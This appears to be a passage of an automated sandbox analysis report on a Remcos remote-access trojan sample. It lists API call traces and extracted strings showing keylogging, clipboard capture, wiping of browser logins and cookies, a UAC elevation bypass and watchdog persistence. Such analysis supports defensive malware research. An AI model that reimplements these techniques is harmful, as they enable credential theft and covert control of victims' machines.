                                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                            • API String ID: 65172268-860466531
                                                                                                            • Opcode ID: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                                                                                                            • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                                                                            • Opcode Fuzzy Hash: 3d2ec039f958bf048a8c201d7f8a81e9ba8d6979ff7f871c800e70ef052d4e82
                                                                                                            • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                            • API String ID: 1164774033-3681987949
                                                                                                            • Opcode ID: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                                                                                                            • Instruction ID: 6ff196721abdd8e0f3db8d3f3c96df629808f1f9148939b99990ee587e15bfec
                                                                                                            • Opcode Fuzzy Hash: a55c21d547313303409bc2568ceb902046709c86c763491b0c53e4f2ca284d26
                                                                                                            • Instruction Fuzzy Hash: 31512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                            • API String ID: 3527384056-432212279
                                                                                                            • Opcode ID: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                                                                                                            • Instruction ID: 007be0ece90fca0e9f39ea1f272cf2b8da877aadfcc1370f70eac597690c30d9
                                                                                                            • Opcode Fuzzy Hash: a71f50fce03a6b89e47498d88d246ee68c23d58d563221132017ac6cdd0e80fc
                                                                                                            • Instruction Fuzzy Hash: A7414B319042196ACB14F7A1EC569EE7768EF21318F50017FF801B31E2EF399A45CA9E
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                            • API String ID: 726551946-3025026198
                                                                                                            • Opcode ID: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                                                                                                            • Instruction ID: ff5f769c9d2eb9d60ee5c92f3007ac3329fe223f24fa54890becbfeace6a8f7f
                                                                                                            • Opcode Fuzzy Hash: 30da1d47b11118a268f62bc142a88eb8f37d6f01f4d3dd7acdbf78fe8c56f144
                                                                                                            • Instruction Fuzzy Hash: 647182311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A919CA9A
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3520204547-0
                                                                                                            • Opcode ID: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                                                                                                            • Instruction ID: 65deba99f03779ab530566add8b8501f772d12743f07501a5a0e0bdfe921cf26
                                                                                                            • Opcode Fuzzy Hash: 6ed8a15f85b4eda99e75bc68e9c644e8b427782961166fcaf36fdd4c8f2d64f9
                                                                                                            • Instruction Fuzzy Hash: 232183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0$1$2$3$4$5$6$7
                                                                                                            • API String ID: 0-3177665633
                                                                                                            • Opcode ID: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                                                                                                            • Instruction ID: 8a7243103da74f60d5bbefacb9012cb64624b509857c51ebf6f1776beea37390
                                                                                                            • Opcode Fuzzy Hash: aa35b6c391b669857e709787408fc35d19a5eec55d3d5a0aced25700c68607bb
                                                                                                            • Instruction Fuzzy Hash: EE61B470508301AEDB00EF21C862FEE77E4AF95754F40485EF591672E2DB78AA48C797
                                                                                                            APIs
                                                                                                            • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                            • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                            • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                            • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                            • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                            • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                            • String ID: X[G
                                                                                                            • API String ID: 1888522110-739899062
                                                                                                            • Opcode ID: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                                                                                                            • Instruction ID: b3d75429b008435a5e1dd269aa2dc422b6d7dab2ccd5499d38c457950c038251
                                                                                                            • Opcode Fuzzy Hash: e493efd0b8b4558b132da8245606e3aa1f2ec85b30bd84d249f064ae8ad69455
                                                                                                            • Instruction Fuzzy Hash: 7C318F72544308AFE700DF90EC45FDBBBECEB48715F00083ABA45961A1D7B5E948DBA6
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 00406788
                                                                                                            • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Object_wcslen
                                                                                                            • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                            • API String ID: 240030777-3166923314
                                                                                                            • Opcode ID: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                            • Instruction ID: 8131e8b3f96e11b5c9c7103c6ecb9350ac77814929071503a065d606a7b617cc
                                                                                                            • Opcode Fuzzy Hash: fb4b37c01a82ea3e6f4d6ea97501aa73dd573a9fa8d004a292a27325ecfbba87
                                                                                                            • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                                                                                                            APIs
                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                                                                                                            • GetLastError.KERNEL32 ref: 00419945
                                                                                                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3587775597-0
                                                                                                            • Opcode ID: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                                                                                                            • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                                                                                                            • Opcode Fuzzy Hash: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                                                                                                            • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                            • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                            • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                            • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                            • String ID: Keylogger initialization failure: error $`#v
                                                                                                            • API String ID: 3219506041-3226811161
                                                                                                            • Opcode ID: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                                                                                                            • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                                                                                                            • Opcode Fuzzy Hash: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                                                                                                            • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                                                                                                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 2341273852-0
                                                                                                            • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                            • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                                                                                                            • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                                                                                                            • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                            • API String ID: 2127411465-314212984
                                                                                                            • Opcode ID: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
                                                                                                            • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                                                                                                            • Opcode Fuzzy Hash: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
                                                                                                            • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                            • GetLastError.KERNEL32 ref: 0040B261
                                                                                                            Strings
                                                                                                            • UserProfile, xrefs: 0040B227
                                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                            • API String ID: 2018770650-1062637481
                                                                                                            • Opcode ID: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                                                                                                            • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                                                                                                            • Opcode Fuzzy Hash: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                                                                                                            • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                            • GetLastError.KERNEL32 ref: 00416B02
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                            • API String ID: 3534403312-3733053543
                                                                                                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                                                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                                                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 004089AE
                                                                                                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 4043647387-0
                                                                                                            • Opcode ID: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                                                                                                            • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                                                                                                            • Opcode Fuzzy Hash: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                                                                                                            • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                                                                                                            APIs
                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                            • String ID:
                                                                                                            • API String ID: 276877138-0
                                                                                                            • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                            • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                                                                                                            • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                                                            • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                                                                                                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                            • String ID: @CG$XCG$>G
                                                                                                            • API String ID: 341183262-3030817687
                                                                                                            • Opcode ID: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
                                                                                                            • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                                                                                                            • Opcode Fuzzy Hash: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
                                                                                                            • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                                                                                                            APIs
                                                                                                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                            • String ID: PowrProf.dll$SetSuspendState
                                                                                                            • API String ID: 1589313981-1420736420
                                                                                                            • Opcode ID: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                                                                                                            • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                                                                                                            • Opcode Fuzzy Hash: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                                                                                                            • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
